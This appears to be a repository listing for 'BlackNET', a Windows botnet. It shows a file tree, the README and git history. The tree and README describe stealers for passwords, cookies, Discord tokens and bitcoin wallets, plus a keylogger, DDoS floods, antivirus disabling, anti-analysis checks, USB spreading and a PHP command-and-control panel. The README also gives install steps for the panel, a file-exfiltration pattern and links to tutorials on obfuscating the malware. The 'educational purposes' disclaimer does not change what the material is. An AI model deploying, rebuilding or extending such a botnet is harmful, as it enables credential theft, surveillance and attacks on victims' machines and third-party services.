======================: FILES :======================
BlackNET
├── BlackNET - Compiled
│   ├── BlackNET Builder.exe
│   ├── Mono.Cecil.dll
│   ├── stub.exe
│   └── watcher.exe
├── BlackNET Panel
│   ├── asset
│   │   ├── css
│   │   │   ├── bootstrap-switch.css
│   │   │   ├── sb-admin.css
│   │   │   └── sb-admin.min.css
│   │   ├── index.php
│   │   ├── js
│   │   │   ├── bootstrap-switch
│   │   │   │   ├── bootstrap-switch.js
│   │   │   │   ├── highlight.js
│   │   │   │   └── main.js
│   │   │   ├── datamaps.world.min.js
│   │   │   ├── demo
│   │   │   │   └── datatables-demo.js
│   │   │   ├── sb-admin.js
│   │   │   └── sb-admin.min.js
│   │   └── vendor
│   │       ├── bootstrap
│   │       │   ├── css
│   │       │   │   ├── bootstrap.css
│   │       │   │   ├── bootstrap-grid.css
│   │       │   │   ├── bootstrap-grid.min.css
│   │       │   │   ├── bootstrap.min.css
│   │       │   │   ├── bootstrap-reboot.css
│   │       │   │   └── bootstrap-reboot.min.css
│   │       │   └── js
│   │       │       ├── bootstrap.bundle.js
│   │       │       ├── bootstrap.bundle.min.js
│   │       │       ├── bootstrap.js
│   │       │       └── bootstrap.min.js
│   │       ├── datatables
│   │       │   ├── dataTables.bootstrap4.css
│   │       │   ├── dataTables.bootstrap4.js
│   │       │   ├── dataTables.bootstrap4.min.css
│   │       │   ├── dataTables.bootstrap4.min.js
│   │       │   ├── jquery.dataTables.js
│   │       │   └── jquery.dataTables.min.js
│   │       ├── fontawesome-free
│   │       │   ├── css
│   │       │   │   ├── all.css
│   │       │   │   ├── all.min.css
│   │       │   │   ├── brands.css
│   │       │   │   ├── brands.min.css
│   │       │   │   ├── fontawesome.css
│   │       │   │   ├── fontawesome.min.css
│   │       │   │   ├── regular.css
│   │       │   │   ├── regular.min.css
│   │       │   │   ├── solid.css
│   │       │   │   ├── solid.min.css
│   │       │   │   ├── svg-with-js.css
│   │       │   │   ├── svg-with-js.min.css
│   │       │   │   ├── v4-shims.css
│   │       │   │   └── v4-shims.min.css
│   │       │   ├── js
│   │       │   │   ├── all.js
│   │       │   │   ├── all.min.js
│   │       │   │   ├── brands.js
│   │       │   │   ├── brands.min.js
│   │       │   │   ├── conflict-detection.js
│   │       │   │   ├── conflict-detection.min.js
│   │       │   │   ├── fontawesome.js
│   │       │   │   ├── fontawesome.min.js
│   │       │   │   ├── regular.js
│   │       │   │   ├── regular.min.js
│   │       │   │   ├── solid.js
│   │       │   │   ├── solid.min.js
│   │       │   │   ├── v4-shims.js
│   │       │   │   └── v4-shims.min.js
│   │       │   ├── LICENSE.txt
│   │       │   └── webfonts
│   │       │       ├── fa-brands-400.eot
│   │       │       ├── fa-brands-400.svg
│   │       │       ├── fa-brands-400.ttf
│   │       │       ├── fa-brands-400.woff
│   │       │       ├── fa-brands-400.woff2
│   │       │       ├── fa-regular-400.eot
│   │       │       ├── fa-regular-400.svg
│   │       │       ├── fa-regular-400.ttf
│   │       │       ├── fa-regular-400.woff
│   │       │       ├── fa-regular-400.woff2
│   │       │       ├── fa-solid-900.eot
│   │       │       ├── fa-solid-900.svg
│   │       │       ├── fa-solid-900.ttf
│   │       │       ├── fa-solid-900.woff
│   │       │       └── fa-solid-900.woff2
│   │       ├── jquery
│   │       │   ├── jquery.js
│   │       │   ├── jquery.min.js
│   │       │   ├── jquery.min.map
│   │       │   ├── jquery.slim.js
│   │       │   ├── jquery.slim.min.js
│   │       │   └── jquery.slim.min.map
│   │       ├── jquery-easing
│   │       │   ├── jquery.easing.compatibility.js
│   │       │   ├── jquery.easing.js
│   │       │   └── jquery.easing.min.js
│   │       └── jvector
│   │           ├── css
│   │           │   └── jvector.css
│   │           └── js
│   │               ├── core.js
│   │               └── world.js
│   ├── auth.php
│   ├── authsettings.php
│   ├── changePassword.php
│   ├── check_panel.php
│   ├── classes
│   │   ├── Auth.php
│   │   ├── blackupload
│   │   │   ├── extension.json
│   │   │   ├── forbidden.json
│   │   │   ├── mime.json
│   │   │   └── Upload.php
│   │   ├── Clients.php
│   │   ├── Database.php
│   │   ├── index.php
│   │   ├── Mailer.php
│   │   ├── POST.php
│   │   ├── ResetPassword.php
│   │   ├── Settings.php
│   │   ├── Update.php
│   │   ├── User.php
│   │   └── Utils.php
│   ├── components
│   │   ├── clientsList.php
│   │   ├── commandController.php
│   │   ├── commands.php
│   │   ├── css.php
│   │   ├── footer.php
│   │   ├── header.php
│   │   ├── js.php
│   │   ├── meta.php
│   │   ├── s2famsg.php
│   │   └── stats.php
│   ├── config
│   │   └── config.sample.php
│   ├── connection.php
│   ├── counter.php
│   ├── error_logs
│   │   └── index.php
│   ├── expire.php
│   ├── favico.png
│   ├── flags
│   │   ├── ad.png
│   │   ├── ae.png
│   │   ├── af.png
│   │   ├── ag.png
│   │   ├── ai.png
│   │   ├── al.png
│   │   ├── am.png
│   │   ├── an.png
│   │   ├── ao.png
│   │   ├── ar.png
│   │   ├── as.png
│   │   ├── at.png
│   │   ├── au.png
│   │   ├── aw.png
│   │   ├── ax.png
│   │   ├── az.png
│   │   ├── ba.png
│   │   ├── bb.png
│   │   ├── bd.png
│   │   ├── be.png
│   │   ├── bf.png
│   │   ├── bg.png
│   │   ├── bh.png
│   │   ├── bi.png
│   │   ├── bj.png
│   │   ├── bm.png
│   │   ├── bn.png
│   │   ├── bo.png
│   │   ├── br.png
│   │   ├── bs.png
│   │   ├── bt.png
│   │   ├── bv.png
│   │   ├── bw.png
│   │   ├── by.png
│   │   ├── bz.png
│   │   ├── ca.png
│   │   ├── catalonia.png
│   │   ├── cc.png
│   │   ├── cd.png
│   │   ├── cf.png
│   │   ├── cg.png
│   │   ├── ch.png
│   │   ├── ci.png
│   │   ├── ck.png
│   │   ├── cl.png
│   │   ├── cm.png
│   │   ├── cn.png
│   │   ├── co.png
│   │   ├── cr.png
│   │   ├── cs.png
│   │   ├── cu.png
│   │   ├── cv.png
│   │   ├── cx.png
│   │   ├── cy.png
│   │   ├── cz.png
│   │   ├── de.png
│   │   ├── dj.png
│   │   ├── dk.png
│   │   ├── dm.png
│   │   ├── do.png
│   │   ├── dz.png
│   │   ├── ec.png
│   │   ├── ee.png
│   │   ├── eg.png
│   │   ├── eh.png
│   │   ├── en.png
│   │   ├── er.png
│   │   ├── es.png
│   │   ├── et.png
│   │   ├── fi.png
│   │   ├── fj.png
│   │   ├── fk.png
│   │   ├── fm.png
│   │   ├── fo.png
│   │   ├── fr.png
│   │   ├── ga.png
│   │   ├── gb.png
│   │   ├── gd.png
│   │   ├── ge.png
│   │   ├── gf.png
│   │   ├── gh.png
│   │   ├── gi.png
│   │   ├── gl.png
│   │   ├── gm.png
│   │   ├── gn.png
│   │   ├── gp.png
│   │   ├── gq.png
│   │   ├── gr.png
│   │   ├── gs.png
│   │   ├── gt.png
│   │   ├── gu.png
│   │   ├── gw.png
│   │   ├── gy.png
│   │   ├── hk.png
│   │   ├── hm.png
│   │   ├── hn.png
│   │   ├── hr.png
│   │   ├── ht.png
│   │   ├── hu.png
│   │   ├── id.png
│   │   ├── ie.png
│   │   ├── il.png
│   │   ├── index.php
│   │   ├── in.png
│   │   ├── io.png
│   │   ├── iq.png
│   │   ├── ir.png
│   │   ├── is.png
│   │   ├── it.png
│   │   ├── jm.png
│   │   ├── jo.png
│   │   ├── jp.png
│   │   ├── ke.png
│   │   ├── kg.png
│   │   ├── kh.png
│   │   ├── ki.png
│   │   ├── km.png
│   │   ├── kn.png
│   │   ├── kp.png
│   │   ├── kr.png
│   │   ├── kw.png
│   │   ├── ky.png
│   │   ├── kz.png
│   │   ├── la.png
│   │   ├── lb.png
│   │   ├── lc.png
│   │   ├── li.png
│   │   ├── lk.png
│   │   ├── lr.png
│   │   ├── ls.png
│   │   ├── lt.png
│   │   ├── lu.png
│   │   ├── lv.png
│   │   ├── ly.png
│   │   ├── ma.png
│   │   ├── mc.png
│   │   ├── md.png
│   │   ├── me.png
│   │   ├── mg.png
│   │   ├── mh.png
│   │   ├── mk.png
│   │   ├── ml.png
│   │   ├── mm.png
│   │   ├── mn.png
│   │   ├── mo.png
│   │   ├── mp.png
│   │   ├── mq.png
│   │   ├── mr.png
│   │   ├── ms.png
│   │   ├── mt.png
│   │   ├── mu.png
│   │   ├── mv.png
│   │   ├── mw.png
│   │   ├── mx.png
│   │   ├── my.png
│   │   ├── mz.png
│   │   ├── na.png
│   │   ├── nc.png
│   │   ├── ne.png
│   │   ├── nf.png
│   │   ├── ng.png
│   │   ├── ni.png
│   │   ├── nl.png
│   │   ├── no.png
│   │   ├── np.png
│   │   ├── nr.png
│   │   ├── nu.png
│   │   ├── nz.png
│   │   ├── om.png
│   │   ├── pa.png
│   │   ├── pe.png
│   │   ├── pf.png
│   │   ├── pg.png
│   │   ├── ph.png
│   │   ├── pk.png
│   │   ├── pl.png
│   │   ├── pm.png
│   │   ├── pn.png
│   │   ├── pr.png
│   │   ├── ps.png
│   │   ├── pt.png
│   │   ├── pw.png
│   │   ├── py.png
│   │   ├── qa.png
│   │   ├── re.png
│   │   ├── ro.png
│   │   ├── rs.png
│   │   ├── ru.png
│   │   ├── rw.png
│   │   ├── sa.png
│   │   ├── sb.png
│   │   ├── scotland.png
│   │   ├── sc.png
│   │   ├── sd.png
│   │   ├── se.png
│   │   ├── sg.png
│   │   ├── sh.png
│   │   ├── si.png
│   │   ├── sj.png
│   │   ├── sk.png
│   │   ├── sl.png
│   │   ├── sm.png
│   │   ├── sn.png
│   │   ├── so.png
│   │   ├── sr.png
│   │   ├── st.png
│   │   ├── sv.png
│   │   ├── sy.png
│   │   ├── sz.png
│   │   ├── tc.png
│   │   ├── td.png
│   │   ├── tf.png
│   │   ├── tg.png
│   │   ├── th.png
│   │   ├── tj.png
│   │   ├── tk.png
│   │   ├── tl.png
│   │   ├── tm.png
│   │   ├── tn.png
│   │   ├── to.png
│   │   ├── tr.png
│   │   ├── tt.png
│   │   ├── tv.png
│   │   ├── tw.png
│   │   ├── tz.png
│   │   ├── ua.png
│   │   ├── ug.png
│   │   ├── um.png
│   │   ├── us.png
│   │   ├── uy.png
│   │   ├── uz.png
│   │   ├── va.png
│   │   ├── vc.png
│   │   ├── ve.png
│   │   ├── vg.png
│   │   ├── vi.png
│   │   ├── vn.png
│   │   ├── vu.png
│   │   ├── wf.png
│   │   ├── wl.png
│   │   ├── ws.png
│   │   ├── X.png
│   │   ├── ye.png
│   │   ├── yt.png
│   │   ├── za.png
│   │   ├── zm.png
│   │   └── zw.png
│   ├── forgot-password.php
│   ├── getCommand.php
│   ├── getcontery.php
│   ├── getlocation.php
│   ├── imgs
│   │   ├── index.php
│   │   ├── offline.png
│   │   ├── online.png
│   │   └── placeholder.jpg
│   ├── includes
│   │   ├── deleteLogs.php
│   │   ├── export.php
│   │   ├── index.php
│   │   ├── questions.php
│   │   ├── updateAuth.php
│   │   ├── updatePassword.php
│   │   └── updateSettings.php
│   ├── index.php
│   ├── install.php
│   ├── jobs
│   │   ├── ping.php
│   │   └── remove.php
│   ├── login.php
│   ├── logout.php
│   ├── menus
│   │   ├── ddos_attack.html
│   │   ├── execute.html
│   │   ├── get_file.html
│   │   ├── index.php
│   │   ├── messagebox.html
│   │   ├── move_bot.html
│   │   ├── openpage.html
│   │   ├── rshell.html
│   │   ├── run_custom.php
│   │   ├── sendemail.html
│   │   ├── stop_ddos.html
│   │   └── upload.html
│   ├── plugins
│   │   ├── FileSearcher.dll
│   │   ├── HistoryStealer.dll
│   │   ├── index.php
│   │   ├── Ionic.Zip.dll
│   │   ├── Newtonsoft.Json.dll
│   │   ├── PasswordStealer.dll
│   │   └── PluginExample.dll
│   ├── post.php
│   ├── question.php
│   ├── receive.php
│   ├── remoteshell.php
│   ├── reset.php
│   ├── rmfile.php
│   ├── scripts
│   │   └── index.php
│   ├── sendcommand.php
│   ├── session.php
│   ├── settings.php
│   ├── template.php
│   ├── update.php
│   ├── upload
│   │   └── index.php
│   ├── upload.php
│   ├── vendor
│   │   ├── auth
│   │   │   ├── FixedBitNotation.php
│   │   │   ├── GoogleAuthenticator.php
│   │   │   ├── GoogleQrUrl.php
│   │   │   └── RuntimeException.php
│   │   ├── index.php
│   │   └── phpmailer
│   │       └── phpmailer
│   │           ├── get_oauth_token.php
│   │           ├── language
│   │           │   ├── phpmailer.lang-af.php
│   │           │   ├── phpmailer.lang-am.php
│   │           │   ├── phpmailer.lang-ar.php
│   │           │   ├── phpmailer.lang-az.php
│   │           │   ├── phpmailer.lang-ba.php
│   │           │   ├── phpmailer.lang-be.php
│   │           │   ├── phpmailer.lang-bg.php
│   │           │   ├── phpmailer.lang-ca.php
│   │           │   ├── phpmailer.lang-ch.php
│   │           │   ├── phpmailer.lang-cs.php
│   │           │   ├── phpmailer.lang-da.php
│   │           │   ├── phpmailer.lang-de.php
│   │           │   ├── phpmailer.lang-el.php
│   │           │   ├── phpmailer.lang-eo.php
│   │           │   ├── phpmailer.lang-es.php
│   │           │   ├── phpmailer.lang-et.php
│   │           │   ├── phpmailer.lang-fa.php
│   │           │   ├── phpmailer.lang-fi.php
│   │           │   ├── phpmailer.lang-fo.php
│   │           │   ├── phpmailer.lang-fr.php
│   │           │   ├── phpmailer.lang-gl.php
│   │           │   ├── phpmailer.lang-he.php
│   │           │   ├── phpmailer.lang-hi.php
│   │           │   ├── phpmailer.lang-hr.php
│   │           │   ├── phpmailer.lang-hu.php
│   │           │   ├── phpmailer.lang-id.php
│   │           │   ├── phpmailer.lang-it.php
│   │           │   ├── phpmailer.lang-ja.php
│   │           │   ├── phpmailer.lang-ka.php
│   │           │   ├── phpmailer.lang-ko.php
│   │           │   ├── phpmailer.lang-lt.php
│   │           │   ├── phpmailer.lang-lv.php
│   │           │   ├── phpmailer.lang-mg.php
│   │           │   ├── phpmailer.lang-ms.php
│   │           │   ├── phpmailer.lang-nb.php
│   │           │   ├── phpmailer.lang-nl.php
│   │           │   ├── phpmailer.lang-pl.php
│   │           │   ├── phpmailer.lang-pt_br.php
│   │           │   ├── phpmailer.lang-pt.php
│   │           │   ├── phpmailer.lang-ro.php
│   │           │   ├── phpmailer.lang-ru.php
│   │           │   ├── phpmailer.lang-sk.php
│   │           │   ├── phpmailer.lang-sl.php
│   │           │   ├── phpmailer.lang-sr.php
│   │           │   ├── phpmailer.lang-sv.php
│   │           │   ├── phpmailer.lang-tl.php
│   │           │   ├── phpmailer.lang-tr.php
│   │           │   ├── phpmailer.lang-uk.php
│   │           │   ├── phpmailer.lang-vi.php
│   │           │   ├── phpmailer.lang-zh_cn.php
│   │           │   └── phpmailer.lang-zh.php
│   │           └── src
│   │               ├── Exception.php
│   │               ├── OAuth.php
│   │               ├── PHPMailer.php
│   │               ├── POP3.php
│   │               └── SMTP.php
│   ├── viewlogs.php
│   ├── viewpasswords.php
│   └── viewuploads.php
├── BlackNET - Source Code
│   ├── BlackNet Builder
│   │   ├── BlackNet Builder
│   │   │   ├── app.config
│   │   │   ├── Binder.Designer.vb
│   │   │   ├── Binder.resx
│   │   │   ├── Binder.vb
│   │   │   ├── BlackNet Builder.vbproj
│   │   │   ├── Form1.Designer.vb
│   │   │   ├── Form1.resx
│   │   │   ├── Form1.vb
│   │   │   ├── IconInjection.vb
│   │   │   ├── My Project
│   │   │   │   ├── Application.Designer.vb
│   │   │   │   ├── Application.myapp
│   │   │   │   ├── app.manifest
│   │   │   │   ├── AssemblyInfo.vb
│   │   │   │   ├── Resources.Designer.vb
│   │   │   │   ├── Resources.resx
│   │   │   │   ├── Settings.Designer.vb
│   │   │   │   └── Settings.settings
│   │   │   ├── Papirus-Team-Papirus-Apps-Worms.ico
│   │   │   └── Theme.vb
│   │   └── BlackNet Builder.sln
│   └── PHPStub
│       ├── E.sln
│       └── PHPStub
│           ├── Antis
│           │   ├── Anti_Debugging.vb
│           │   ├── AntiVM.vb
│           │   └── DisableWD.vb
│           ├── app.config
│           ├── DDOS
│           │   ├── ARME.vb
│           │   ├── BandwidthFlood.vb
│           │   ├── Condis.vb
│           │   ├── HTTPGet.vb
│           │   ├── PostHTTP.vb
│           │   ├── Slowloris.vb
│           │   └── UDPAttack.vb
│           ├── E.vbproj
│           ├── MainController.Designer.vb
│           ├── MainController.resx
│           ├── MainController.vb
│           ├── My Project
│           │   ├── Application.Designer.vb
│           │   ├── Application.myapp
│           │   ├── AssemblyInfo.vb
│           │   ├── Resources.Designer.vb
│           │   ├── Resources.resx
│           │   ├── Settings.Designer.vb
│           │   └── Settings.settings
│           ├── Other
│           │   ├── Binder.vb
│           │   ├── BrowserHandler.vb
│           │   ├── DiscordGrabber.vb
│           │   ├── DiscordToken.vb
│           │   ├── Keylogger.vb
│           │   ├── RemoteDesktop.vb
│           │   └── Watchdog.vb
│           ├── Persistence
│           │   ├── SchTask.vb
│           │   ├── Startup.vb
│           │   └── Stealth_Mode.vb
│           ├── Socket
│           │   ├── Encryption.vb
│           │   └── HTTP.vb
│           └── Spreads
│               ├── DropboxSpread.vb
│               └── USB.vb
├── FileSearcher
│   ├── FileSearcher
│   │   ├── FileSearcher.vb
│   │   ├── FileSearcher.vbproj
│   │   └── My Project
│   │       ├── Application.Designer.vb
│   │       ├── Application.myapp
│   │       ├── AssemblyInfo.vb
│   │       ├── Resources.Designer.vb
│   │       ├── Resources.resx
│   │       ├── Settings.Designer.vb
│   │       └── Settings.settings
│   └── FileSearcher.sln
├── HistoryStealer
│   ├── HistoryStealer
│   │   ├── HistoryStealer.vbproj
│   │   ├── My Project
│   │   │   ├── Application.Designer.vb
│   │   │   ├── Application.myapp
│   │   │   ├── AssemblyInfo.vb
│   │   │   ├── Resources.Designer.vb
│   │   │   ├── Resources.resx
│   │   │   ├── Settings.Designer.vb
│   │   │   └── Settings.settings
│   │   ├── SQLiteHandler.vb
│   │   └── Stealer.vb
│   └── HistoryStealer.sln
├── LICENSE
├── PluginExample
│   ├── PluginExample
│   │   ├── My Project
│   │   │   ├── Application.Designer.vb
│   │   │   ├── Application.myapp
│   │   │   ├── AssemblyInfo.vb
│   │   │   ├── Resources.Designer.vb
│   │   │   ├── Resources.resx
│   │   │   ├── Settings.Designer.vb
│   │   │   └── Settings.settings
│   │   ├── PluginExample.vbproj
│   │   └── Plugin.vb
│   └── PluginExample.sln
├── README.md
├── version.txt
└── WatcherService
    ├── WatcherService
    │   ├── MainController.Designer.vb
    │   ├── MainController.resx
    │   ├── MainController.vb
    │   ├── My Project
    │   │   ├── Application.Designer.vb
    │   │   ├── Application.myapp
    │   │   ├── AssemblyInfo.vb
    │   │   ├── Resources.Designer.vb
    │   │   ├── Resources.resx
    │   │   ├── Settings.Designer.vb
    │   │   └── Settings.settings
    │   ├── ProcessWatcher.vb
    │   └── WatcherService.vbproj
    └── WatcherService.sln

65 directories, 592 files
======================: README CONTENT :======================
<p align="center">
 <img src="https://a.top4top.io/p_1104t3ole1.png" alt="" />
</p>

<p align="center">
 <a href="#"><img align="center" src="https://img.shields.io/maintenance/no/2020" /></a> 
</p>

# BlackNET
Free advanced and modern Windows botnet with a nice and secure PHP panel developed using VB.NET.

## About BlackNET

# This Project is Deprecated

## What You Can Do
 1. Upload File
 2. DDOS Attack [ TCP,UDP,ARME,Slowloris, HTTPGet, POSTHttp, Bandwidth Flood ]
    + Start DDOS
    + Stop DDOS
 3. Open Webpage
     + Visible
     + Hidden
 4. Show MessageBox
 5. Take Screenshot
 6. Steal Firefox Cookies
 7. Steal Saved Passwords [ Chrome, Firefox ]
 8. Steal Chrome Cookies
 9. Steal Discord Token
 10. Steal Chrome Hisory
 11. Execute Shell Commands [ CMD, Powershell ]
 12. Send Spam Emails
 13. Keylogger
 14. Execute Scripts
 15. Computer Operations
     + Restart
     + Shutdown
     + Logout
 16. Bitcoint Wallet Stealer
 17. Uninstall Client
 18. Move Client
 19. Blacklist Client
 20. Close Client
 
## Requirements
1. PHP >=  7.0
    + cURL
    + php_cURL
2. NET Framework
    + Stub >= 2.0
    + Builder >= 4.0

## How to Install PHP Panel
1. Clone this Repo
2. Compress BlackNET panel folder and upload it to your hosting
3. Create a database with any name you want
4. Change the database information in config/config.sample.php
5. Rename config.sample.php to config.php
6. Change files and folders permission to 777 [ Uploads Folder, Scripts Folder ]
7. Make Sure that all DLLs are included in Plugins Folder
8. Go to install.php to create the botnet tables automatically
9. Enable a Cron Job for ping.php and remove.php

## How to secure BlackNET
1. Remove install.php and update.php
2. Change username and password
3. Add an email address to your account
4. Enable Captcha using Google reCaptcha v2
5. Enable 2FA on your account

## How to use the File Searcher Function
1. execute command on the client
2. use this pattern ``` %Userprofile%|[Here write extension list] ```
3. Wait untile the plugin finish the process and upload the files

Pattern Example:
```
%Userprofile%|[jpg,png,docx,pdf,logs,txt,pptx,psd,rtf]
```


## YouTube Tutorials
[How to install BlackNET v3.5.1](https://youtu.be/cijbJ7s6IXA)

[How to obfuscate BlackNET](https://www.youtube.com/watch?v=hzC8_UYGor0)

[How to Setup BlackNET Cron Job System](https://www.youtube.com/watch?v=rHCYGRA1h54)


## Thanks to
- KFC
- NYAN CAT
- omerfademir

## LEGAL DISCLAIMER PLEASE READ!
##### I, the creator and all those associated with the development and production of this program are not responsible for any actions and or damages caused by this software. You bear the full responsibility of your actions and acknowledge that this software was created for educational purposes only. This software's intended purpose is NOT to be used maliciously, or on any system that you do not have own or have explicit permission to operate and use this program on. By using this software, you automatically agree to the above.

## License
This project is licensed under the MIT License


## Copyright
[![Open Source Love svg1](https://badges.frapsoft.com/os/v1/open-source.png?v=103)](https://github.com/ellerbrock/open-source-badges/) 

Copyright © Black.Hacker - 2020
====================== GIT HISTORY: ======================
1954950 HEAD@{0}: clone: from https://github.com/terncgod/BlackNET
commit 19549509fc109e6275749510b6bdfe24d92cc2bf
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Mon Jun 1 06:50:24 2020 +0300

    Update README.md

commit 3ab9f4e0ae57645adff5eb7bdfbfef3d9b32455f
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Mon Jun 1 05:02:00 2020 +0300

    v3.5.1
    
    DO NOT TOUCH THE APP_PATH

commit 3f0d6841c799c0c6e280bb6000571a24d0b92c6b
Author: Black.Hacker <farisksa79@gmail.com>
Date:   Mon Jun 1 04:59:45 2020 +0300

    v3.5.1
